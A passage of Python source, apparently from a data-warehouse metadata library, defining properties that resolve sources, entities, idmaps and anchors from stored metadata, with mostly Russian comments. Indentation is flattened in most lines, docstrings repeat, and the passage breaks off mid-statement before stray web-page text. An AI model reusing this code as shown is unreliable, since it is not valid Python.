        The remaining p_* arguments hold explicitly supplied related objects;
        when absent they are resolved from the metadata by the corresponding
        properties.
        """
        self._type=p_type
        self._id=p_id
        self.l_id=copy.copy(uuid.uuid4()) # copied so the fallback id does not change on every access
        self._source_table=p_source_table
        self._source_attribute=p_source_attribute
        self._entity=p_entity
        self._entity_attribute=p_entity_attribute
        self._link_entity=p_link_entity
        self._idmap=p_idmap
        self._idmap_attribute=p_idmap_attribute
        self._anchor=p_anchor
        self._anchor_attribute=p_anchor_attribute
        self._attribute_table=p_attribute_table
        self._attribute_table_attribute=p_attribute_table_attribute
        self._tie=p_tie
        self._tie_attribute=p_tie_attribute
        self._desc=p_desc
        self._source=p_source
        self._name=p_name
        # when an id is supplied, pull the object's attributes from the metadata
        self.object_attrs_meta=self.__object_attrs_meta()
@property
def id(self):
"""
Id объекта ХД
:return:
"""
if self._id is None:
return self.l_id
else:
return self._id
@property
def name(self):
"""
Наименование
"""
l_name=None
if self._name is not None:
l_name=self._name.lower()
return l_name or self.object_attrs_meta.get(C_NAME,None)
@name.setter
def name(self, p_new_name: str):
self._name=p_new_name
self.object_attrs_meta.pop(C_NAME, None)
def __object_attrs_meta(self):
"""
Атрибуты объекта ХД из метаданных
"""
l_attr_dict={} # словарь для атрибутов из метаданных
if self._id is not None:
l_meta_objs=meta.search_object(
p_type=self._type,
p_uuid=[self._id]
) # достаем метаданные источника
# проверяет на наличие источника в метаданных
if l_meta_objs.__len__()==0:
AbaseError(p_error_text="There's no "+self._type+" with id "+self._id, p_module="DWH", p_class="_DWHObject",
p_def="__object_attrs_meta").raise_error()
else:
l_attr_dict=l_meta_objs[0].attrs
return l_attr_dict
    @property
    def type(self):
        """
        Type of the DWH object (as passed to the constructor).
        """
        return self._type
@property
def source(self):
"""
Таблицы источники
"""
# проверка объекта
_class_checker(p_class_name="Source",p_object=self._source)
# собираем метаданные, если указаны
l_meta_obj=self.object_attrs_meta.get(C_SOURCE,None)
# выбираем из метаданных
l_object=_get_object(p_id=l_meta_obj, p_class_name="Source")
return self._source or l_object
@source.setter
def source(self, p_new_source):
self._source=p_new_source
self.object_attrs_meta.pop(C_SOURCE, None)
@property
def source_table(self):
"""
Таблицы источники
"""
# проверка объекта
_class_checker(p_class_name="SourceTable",p_object=self._source_table)
# собираем метаданные, если указаны
l_meta_obj=self.object_attrs_meta.get(C_QUEUE, None)
# выбираем из метаданных
l_object=_get_object(p_id=l_meta_obj, p_class_name="SourceTable")
return self._source_table or l_object
@source_table.setter
def source_table(self, p_new_source_table):
self._source_table=p_new_source_table
self.object_attrs_meta.pop(C_QUEUE, None)
@property
def source_attribute(self):
"""
Таблицы источники
"""
# проверка объекта
_class_checker(p_class_name="Attribute",p_object=self._source_attribute)
# собираем метаданные, если указаны
l_meta_obj=self.object_attrs_meta.get(C_QUEUE_COLUMN,None)
# выбираем из метаданных
l_object=_get_object(p_id=l_meta_obj, p_class_name="Attribute", p_type=C_QUEUE_COLUMN)
return self._source_attribute or l_object
@source_attribute.setter
def source_attribute(self, p_new_source_attribute):
self._source_attribute=p_new_source_attribute
self.object_attrs_meta.pop(C_QUEUE_COLUMN, None)
@property
def entity(self):
"""
Таблицы источники
"""
# проверка объекта
_class_checker(p_class_name="Entity",p_object=self._entity)
# собираем метаданные, если указаны
l_meta_obj=self.object_attrs_meta.get(C_ENTITY,None)
# выбираем из метаданных
l_object=_get_object(p_id=l_meta_obj, p_class_name="Entity")
return self._entity or l_object
@entity.setter
def entity(self, p_new_entity):
self._entity=p_new_entity
self.object_attrs_meta.pop(C_ENTITY, None)
@property
def link_entity(self):
"""
Таблицы источники
"""
# проверка объекта
_class_checker(p_class_name="Entity",p_object=self._link_entity)
# собираем метаданные, если указаны
l_meta_obj=self.object_attrs_meta.get(C_LINK_ENTITY,None)
# выбираем из метаданных
l_object=_get_object(p_id=l_meta_obj, p_class_name="Entity")
return self._link_entity or l_object
@link_entity.setter
def link_entity(self, p_new_link_entity):
self._link_entity=p_new_link_entity
self.object_attrs_meta.pop(C_LINK_ENTITY, None)
@property
def entity_attribute(self):
"""
Таблицы источники
"""
# проверка объекта
_class_checker(p_class_name="Attribute",p_object=self._entity_attribute)
# собираем метаданные, если указаны
l_meta_obj=self.object_attrs_meta.get(C_ENTITY_COLUMN,None)
# выбираем из метаданных
l_object=_get_object(p_id=l_meta_obj, p_class_name="Attribute",p_type=C_ENTITY_COLUMN)
return self._entity_attribute or l_object
@entity_attribute.setter
def entity_attribute(self, p_new_entity_attribute):
self._entity_attribute=p_new_entity_attribute
self.object_attrs_meta.pop(C_ENTITY_COLUMN, None)
@property
def idmap(self):
"""
Таблицы источники
"""
# проверка объекта
_class_checker(p_class_name="Idmap",p_object=self._idmap)
# собираем метаданные, если указаны
l_meta_obj=self.object_attrs_meta.get(C_IDMAP, None)
# выбираем из метаданных
l_object=_get_object(p_id=l_meta_obj, p_class_name="Idmap")
return self._idmap or l_object
@idmap.setter
def idmap(self, p_new_idmap):
self._idmap=p_new_idmap
self.object_attrs_meta.pop(C_IDMAP, None)
@property
def idmap_attribute(self):
"""
Таблицы источники
"""
# проверка объекта
_class_checker(p_class_name="Attribute",p_object=self._idmap_attribute)
# собираем метаданные, если указаны
l_meta_obj=self.object_attrs_meta.get(C_IDMAP_COLUMN,None)
# выбираем из метаданных
l_object=_get_object(p_id=l_meta_obj, p_class_name="Attribute",p_type=C_IDMAP_COLUMN)
return self._idmap_attribute or l_object
@idmap_attribute.setter
def idmap_attribute(self, p_new_idmap_attribute):
self._idmap_attribute=p_new_idmap_attribute
self.object_attrs_meta.pop(C_IDMAP_COLUMN, None)
@property
def anchor(self):
"""
Таблицы источники
"""
# проверка объекта
_class_checker(p_class_name="Anchor",p_object=self._anchor)
# собираем метаданные, если указаны
l_meta_obj=self.object_attrs_meta.get(C_ANCHOR, None)
# выбираем из метаданных
l_object=_get_object(p_id=l_meta_obj, p_class_name="Anchor")
return self._anchor or l_object
@anchor.setter
def anchor(self, p_new_anchor):
self._anchor=p_new_anchor
self.object_attrs_meta.pop(C_ANCHOR, None)
@property
def anchor_attribute(self):
"""
Таблицы источники
"""
# проверка объекта
_class_checker(p_class_name="Attribute",p_object=self._anchor_attribute)
# собираем метаданные, если указаны
l_meta_obj=self.object_attrs_meta.get(C_ANCHOR_COLUMN,None)
# выбираем из метаданных
l_object=_get_object(p_id=l_meta_obj, p_class_name="Attribute",p_type=C_ANCHOR_COLUMN)
return self._anchor_attribute or l_object
@anchor_attribute.setter
def anchor_attribute(self, p_new_anchor_attribute):
self._anchor_attribute=p_new_anchor_attribute
self.object_attrs_meta.pop(C_ANCHOR_COLUMN, None)
@property
def attribute_table(self):
"""
Таблицы источники
"""
# проверка объекта
_class_checker(p_class_name="AttributeTable",p_object=self._attribute_table)
# собираем метаданные, если указаны
l_meta_obj=self.object_attrs_meta.get(C_ATTRIBUTE_TABLE, None)
# выбираем из метаданных
l_object=_get_object(p_id=l_meta_obj, p_class_name="AttributeTable")
return |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.